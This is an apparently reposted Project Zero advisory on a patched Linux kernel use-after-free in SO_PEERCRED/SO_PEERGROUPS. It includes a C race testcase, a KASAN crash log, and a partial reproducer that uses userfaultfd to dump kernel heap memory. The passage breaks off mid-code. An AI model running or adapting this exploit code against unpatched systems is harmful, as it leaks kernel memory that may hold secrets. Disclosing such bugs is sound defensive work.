Authored by Jann Horn, Google Security Research

Linux suffered from a use-after-free read vulnerability related to an SO_PEERCRED and SO_PEERGROUPS race with listen() (and connect()). This has been addressed in stable versions 5.14.10, 5.10.71, 5.4.151, 4.19.209, 4.14.249, 4.4.288, and 4.9.286.

Linux: UAF read: SO_PEERCRED and SO_PEERGROUPS race with listen() (and connect())

# bug description

In sock_getsockopt() (in net/core/sock.c), the handlers for the
socket options SO_PEERCRED (has probably had a data race since forever
that got turned into a UAF read in v2.6.36, commit "af_unix: Allow
SO_PEERCRED to work across namespaces") and
SO_PEERGROUPS (introduced in v4.13, commit "net: introduce SO_PEERGROUPS
getsockopt") don't use any locking when copying data from
sk->sk_peer_cred to userspace.

This can race with operations that update sk->sk_peer_cred:

- unix_stream_connect() (via copy_peercred(), on CLOSE->ESTABLISHED)
- unix_listen() (via init_peercred(), on CLOSE->LISTEN or LISTEN->LISTEN)

This means that if the creds are replaced and freed at the wrong time, a
use-after-free read occurs.

From what I can tell, the impact on the kernel is limited to data leakage.
Theoretically, it could also lead to an out-of-bounds *write* to
*userspace* memory if a victim process calls SO_PEERGROUPS on a socket
whose ->sk_peer_cred is going away; however, in a normal scenario,
SO_PEERGROUPS would only be called on a socket from accept(), and a
less-privileged attacker wouldn't be able to switch out the ->sk_peer_cred
on that socket.



# simple testcase

In a Linux VM with CONFIG_KASAN=y and CONFIG_RCU_STRICT_GRACE_PERIOD=y,
this issue can be demonstrated with the following testcase.

Note that this testcase is using SO_PEERCRED in a weird way: It reads
the "peer credentials" of a listening socket, which doesn't really make
any semantic sense. As far as I can tell from reading the code, you
could also trigger the same UAF by racing SO_PEERCRED with repeated
calls to connect() and shutdown(<fd>, SHUT_RDWR) instead of listen(),
but then the race would get more complicated.

```
// compile with "gcc -pthread -o peercred_uaf peercred_uaf.c -Wall"
#define _GNU_SOURCE
#include <pthread.h>
#include <sys/fsuid.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <err.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/syscall.h>

static int s;
static uid_t my_uid;
static gid_t my_gid;

void *ucred_thread(void *dummy) {
while (1) {
struct ucred ucred;
socklen_t optlen = sizeof(ucred);
if (getsockopt(s, SOL_SOCKET, SO_PEERCRED, &ucred, &optlen))
perror("getsockopt");
}
}

int main(void) {
my_uid = getuid();
my_gid = getgid();

s = socket(AF_UNIX, SOCK_STREAM, 0);
if (s == -1) err(1, "socket");
struct sockaddr_un bind_addr = {
.sun_family = AF_UNIX,
.sun_path = "/tmp/unix-test-socket"
};
unlink(bind_addr.sun_path);
if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr)))
err(1, "bind");

pthread_t thread;
if (pthread_create(&thread, NULL, ucred_thread, NULL))
errx(1, "pthread_create");

while (1) {
if (listen(s, 16))
perror("listen");
// avoid glibc's automatic thread sync in set*id() wrappers!
// note that setfsuid() doesn't reallocate on no-op request.
if (syscall(__NR_setresuid, my_uid, my_uid, my_uid))
err(1, "setresuid(raw)");
}
}
```

This results in the following splat:

```
BUG: KASAN: use-after-free in sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555)
Read of size 4 at addr ffff8880355c7c64 by task peercred_uaf/619

CPU: 2 PID: 619 Comm: peercred_uaf Not tainted 5.15.0-rc2-00008-g4c17ca27923c #849
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
Call Trace:
dump_stack_lvl (lib/dump_stack.c:107 (discriminator 1))
print_address_description.constprop.0 (mm/kasan/report.c:257)
[...]
kasan_report.cold (mm/kasan/report.c:443 mm/kasan/report.c:459)
[...]
sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555)
[...]
__sys_getsockopt (net/socket.c:2216)
[...]
__x64_sys_getsockopt (net/socket.c:2232)
[...]
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)
RIP: 0033:0x7f93cd99a5ca
Code: 48 8b 0d c9 08 0c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 37 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 96 08 0c 00 f7 d8 64 89 01 48
All code
========
0: 48 8b 0d c9 08 0c 00 mov 0xc08c9(%rip),%rcx # 0xc08d0
7: f7 d8 neg %eax
9: 64 89 01 mov %eax,%fs:(%rcx)
c: 48 83 c8 ff or $0xffffffffffffffff,%rax
10: c3 ret
11: 66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1)
18: 00 00 00
1b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)
20: 49 89 ca mov %rcx,%r10
23: b8 37 00 00 00 mov $0x37,%eax
28: 0f 05 syscall
2a:* 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax <-- trapping instruction
30: 73 01 jae 0x33
32: c3 ret
33: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08d0
3a: f7 d8 neg %eax
3c: 64 89 01 mov %eax,%fs:(%rcx)
3f: 48 rex.W

Code starting with the faulting instruction
===========================================
0: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax
6: 73 01 jae 0x9
8: c3 ret
9: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08a6
10: f7 d8 neg %eax
12: 64 89 01 mov %eax,%fs:(%rcx)
15: 48 rex.W
RSP: 002b:00007f93cd89bec8 EFLAGS: 00000246 ORIG_RAX: 0000000000000037
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f93cd99a5ca
RDX: 0000000000000011 RSI: 0000000000000001 RDI: 0000000000000003
RBP: 00007f93cd89bef0 R08: 00007f93cd89bee0 R09: 00007f93cd89c700
R10: 00007f93cd89bee4 R11: 0000000000000246 R12: 00007ffff07f1cee
R13: 00007ffff07f1cef R14: 00007f93cd89c700 R15: 0000000000000000

Allocated by task 618:
kasan_save_stack (mm/kasan/common.c:38)
__kasan_slab_alloc (mm/kasan/common.c:46 mm/kasan/common.c:434 mm/kasan/common.c:467)
kmem_cache_alloc (./include/linux/kasan.h:254 mm/slab.h:519 mm/slub.c:3206 mm/slub.c:3214 mm/slub.c:3219)
prepare_creds (kernel/cred.c:262)
__sys_setresuid (kernel/sys.c:666)
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)

Freed by task 618:
kasan_save_stack (mm/kasan/common.c:38)
kasan_set_track (mm/kasan/common.c:46)
kasan_set_free_info (mm/kasan/generic.c:362)
__kasan_slab_free (mm/kasan/common.c:368 mm/kasan/common.c:328 mm/kasan/common.c:374)
kmem_cache_free (mm/slub.c:1725 mm/slub.c:3483 mm/slub.c:3499)
rcu_core (kernel/rcu/tree.c:2515 kernel/rcu/tree.c:2743)
__do_softirq (./include/linux/instrumented.h:71 ./include/linux/atomic/atomic-instrumented.h:27 ./include/linux/jump_label.h:266 ./include/linux/jump_label.h:276 ./include/trace/events/irq.h:142 kernel/softirq.c:559)

Last potentially related work creation:
kasan_save_stack (mm/kasan/common.c:38)
kasan_record_aux_stack (mm/kasan/generic.c:348)
call_rcu (kernel/rcu/tree.c:2988 kernel/rcu/tree.c:3067)
init_peercred (./include/linux/cred.h:288 ./include/linux/cred.h:281 net/unix/af_unix.c:613)
unix_listen (net/unix/af_unix.c:648)
__sys_listen (net/socket.c:1727)
__x64_sys_listen (net/socket.c:1734)
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)

The buggy address belongs to the object at ffff8880355c7c40
which belongs to the cache cred_jar of size 192
The buggy address is located 36 bytes inside of
192-byte region [ffff8880355c7c40, ffff8880355c7d00)
The buggy address belongs to the page:
page:ffffea0000d57100 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x355c4
head:ffffea0000d57100 order:2 compound_mapcount:0 compound_pincount:0
flags: 0x4000000000010200(slab|head|zone=1)
raw: 4000000000010200 ffffea0000d57208 ffffea0000d57008 ffff88800642d1c0
raw: 0000000000000000 0000000000190019 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected

Memory state around the buggy address:
ffff8880355c7b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
ffff8880355c7b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
>ffff8880355c7c00: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb
^
ffff8880355c7c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
ffff8880355c7d00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
```


# root-only reproducer for normal systems
The following is a simple reproducer that attempts to use this issue to
dump gigabytes of out-of-bounds kernel memory via SO_PEERGROUPS, which
effectively reads a copy length (sk->sk_peer_cred->group_info->ngroups)
from a dangling pointer in groups_to_user().
(Note: There are two functions called groups_to_user(). The relevant one
is in net/core/sock.c.)

This isn't quite a real exploit - it **requires root privileges** to
call setgroups() and, if userfaultfd is restricted, also to trap a kernel
fault with userfaultfd. I expect that you could get around those
limitations with some work though, assuming that the attacker is running
in a normal Linux userspace.

Note that this bug can still be used to dump gigabytes of kernel heap
memory, even if CONFIG_HARDENED_USERCOPY is enabled, because the
out-of-bounds read occurs outside of usercopy code:

```
static int groups_to_user(gid_t __user *dst, const struct group_info *src)
{
struct user_namespace *user_ns = current_user_ns();
int i;

for (i = 0; i < src->ngroups; i++)
if (put_user(from_kgid_munged(user_ns, src->gid[i]), dst + i))
return -EFAULT;

return 0;
}
```


```
// gcc -o peergroups-leak peergroups-leak.c -Wall -pthread
#define _GNU_SOURCE
#include <pthread.h>
#include <stdbool.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <err.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <grp.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <fcntl.h>
#include <sys/eventfd.h>
#include <limits.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <linux/userfaultfd.h>
#include <linux/membarrier.h>

// kernel sets upper limit: 65536.
// up to 2 pages will be served by slabs, we probably don't want that.
// choose a size between order-3 and order-4 (means needs order-4 page)
#define ALLOC_SIZE ((0x1000 << 3) * 3 / 2)
#define NUM_GROUPS ((ALLOC_SIZE - 8) / 4)
#define OUTPUT_MAPPING_LEN 0x400000000

static int s;
static int launch_eventfd;
static unsigned char *output_mapping;

static void *getsockopt_threadfn(void *dummy) {
eventfd_t evval;
if (eventfd_read(launch_eventfd, &evval))
err(1, "eventfd_read");
socklen_t optlen = INT_MAX;
if (getsockopt(s, SOL_SOCKET, SO_PEERGROUPS, output_mapping, &optlen)) {
perror("getsockopt");
//system("cat /proc/$PPID/maps | grep -v AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
exit(1);
}
return NULL;
}

void dump(char *label) {
printf("
=== DUMP %s ===
", label);
system("grep 'Node.*Unmovable' /proc/pagetypeinfo");
}

int main(void) {
char dummy_char;

// set up sleep-inducing mapping
output_mapping = mmap(NULL, OUTPUT_MAPPING_LEN+0x1000, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (output_mapping == MAP_FAILED) err(1, "mmap");
if (mprotect(output_mapping+OUTPUT_MAPPING_LEN, 0x1000, PROT_NONE))
err(1, "mprotect");
int uffd = syscall(__NR_userfaultfd, O_CLOEXEC);
if (uffd == -1) err(1, "userfaultfd");
struct uffdio_api api = {
.api = UFFD_API,
.features = 0
};
if (ioctl(uffd, UFFDIO_API, &api))
err(1, "UFFDIO_API");
struct uffdio_register reg = {
.range = {.start = (unsigned long)output_mapping, .len = 0x1000},
.mode = UFFDIO_REGISTER_MODE_MISSING
};
if (ioctl(uffd, UFFDIO_REGISTER, &reg))
err(1, "UFFDIO_REGISTER");

// prepare getsockopt() thread
launch_eventfd = eventfd(0, 0);
if (launch_eventfd == -1) err(1, "eventfd");
pthread_t thread;
if (pthread_create(&thread, NULL, getsockopt_threadfn, NULL))
errx(1, "pthread_create");

// set up for reallocation primitive
int realloc_fd = open("/proc/self/maps", O_RDONLY);
if (realloc_fd == -1) err(1, "open maps");

char tmpdir[] = "/tmp/blah.XXXXXX";
if (mkdtemp(tmpdir) == NULL) err(1, "mkdtemp");
if (chdir(tmpdir)) err(1, "chdir tmpdir");
char dummy_name[100];
memset(dummy_name, 'A', 99);
dummy_name[99] = '